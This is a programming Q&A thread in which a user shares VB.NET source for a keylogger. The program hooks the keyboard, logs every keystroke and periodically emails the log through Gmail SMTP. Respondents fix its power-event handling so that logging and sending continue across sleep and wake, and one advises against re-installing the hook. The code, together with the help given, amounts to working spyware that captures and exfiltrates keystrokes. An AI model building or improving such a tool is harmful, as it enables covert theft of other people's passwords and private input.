# Trying to add to string and send email on powermodechanged events

Tags: vb.net, email, event-handling, keylogger

I have a keylogger program used to monitor my network to ensure no one is messing with my information. I've been trying to program in a feature that would add to the ongoing log "system suspended or resumed" and send the log via an email on powermode.suspend or powermode.resume. I'm already able to send the log via email, just not in the powermodes events for some reason. Actually, it seems my program is not executing any commands in my powermodes section, it won't even append the "System Sleep" or "System Wake" line to the log. Here's the code I have so far. Can anyone help point in some sort of direction or offer an explanation for what's going on or how I can resolve it?

I've already tried putting a send email command in the system suspend section, but it gives me an error saying it couldn't send once the system resumes. I have the email log sending any other time fine.

```
Imports System.Net.Mail
Imports Microsoft.Win32

Public Class Form1
Dim WithEvents K As New Keyboard
Dim Append As String
Public Shared log As String

Public Sub Handler()
    AddHandler SystemEvents.PowerModeChanged, _
        AddressOf SystemEvents_PowerModeChanged
End Sub

Private Sub SystemEvents_PowerModeChanged(ByVal sender As Object, ByVal e As PowerModeChangedEventArgs)
    Select Case e.Mode
        Case PowerModes.Resume
            log = log + " <System Wake-Up> "
            SendMail()
            K.DiposeHook()
            K.CreateHook()
            log = ""
        Case PowerModes.Suspend
            log = log + " <System Sleep> "
    End Select
End Sub

Sub SendMail()
    Dim Mail As New MailMessage
    Mail.Subject = "Keylog"
    Mail.To.Add("***********")
    Mail.From = New MailAddress("***********")
    Mail.Body = log
    Dim SMTP As New SmtpClient("smpt.gmail.com")
    SMTP.Host = "smtp.gmail.com"
    SMTP.EnableSsl = True
    SMTP.Credentials = New System.Net.NetworkCredential("*********", "***********")
    SMTP.Port = "587"
    SMTP.Send(Mail)
End Sub

Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
    SendMail()
    K.DiposeHook()
End Sub

Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    K.CreateHook()
End Sub

Private Sub K_Down(ByVal Key As String) Handles K.Down
    Append &= Key
    log &= Key
End Sub

Private Sub tmremail_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmremail.Tick
    tmremail.Stop()

    SendMail()

    log = ""
    tmremail.Enabled = True
End Sub
End Class
```

Edit*

```
    Public Sub Handler()
    AddHandler SystemEvents.PowerModeChanged, _
        AddressOf SystemEvents_PowerModeChanged
End Sub
Public Sub New()
    Me.InitializeComponent()
    Me.Handler() '<- Invoke
End Sub
Private Sub SystemEvents_PowerModeChanged(ByVal sender As Object, ByVal e As PowerModeChangedEventArgs)
    Select Case e.Mode
        Case PowerModes.Resume
            log = log + " <System Wake-Up> "
            SendMail()
            K.DiposeHook()
            K.CreateHook()
            log = ""
        Case PowerModes.Suspend
            log = log + " <System Sleep> "
    End Select
End Sub
```

Comment: Where/when do you call `Handler()`?

Comment: How do I call it? I thought I just had to declare it in a public sub?

Comment: The code inside the `Handler()` will not run unless the method is called, thus no event added. Add `Me.Handler()` to your constructor.

Comment: I've seen that code long time ago... building a keylogger uh? :p
May i ask why are you disposing and installing right away keyboard hook?
Also, you should learn how to use threads.

Comment: @SomeNickName I ran into the problem that after the computer is being left on and just being brought in and out of sleep it seems that the program stops recording the keypresses (thus results in me recieving blank email when I know in fact that there was activity during that time). That's why I'm trying to dispose and install again after the computer wakes up. Is that a good reason to? or is there a better way to solve that problem?

Comment: Well, you should never have to dispose the keyboard hook, when i used to use that class (witch i believe is the same class, as the "DiposeHook" is still there... lol) i never disposed, and it worked just fine. Can you test the events with a Messagebox.Show("Something...") To see if it displays the messagebox, either on resume or suspend events? If not, can you test adding the handler on Form_load? (Which should not make difference, but...

Comment: It all works just fine now, it even sends the email on suspend event now. Again, the only reason I'm disposing and re-installing is to make sure the keypresses continue to be recorded since after being on for a long period of time I notice it stopped recording the keypresses and eventually just stopped sending anything even though the program continued to run on the system (I checked). But, it's all working now so no worries!

Answer (score 2, accepted):

There is no call to `Handler()` in your code, thus no event added. Invoke the method in your construcor like this:

```
Public Sub New()
    Me.InitializeComponent()
    Me.Handler() '<- Invoke
End Sub
```

Comment: Thank you, I'm trying your code now. I'll get back to you in a minute

Comment: It still does nothing on sleep or wake

Comment: Wait, I spoke too soon. It did work, it was just delayed by a few minutes. Maybe because the system had to take time to fully wake up and gain internet access?

Comment: Well, then we both spoke too soon (see my comment up there.. :p)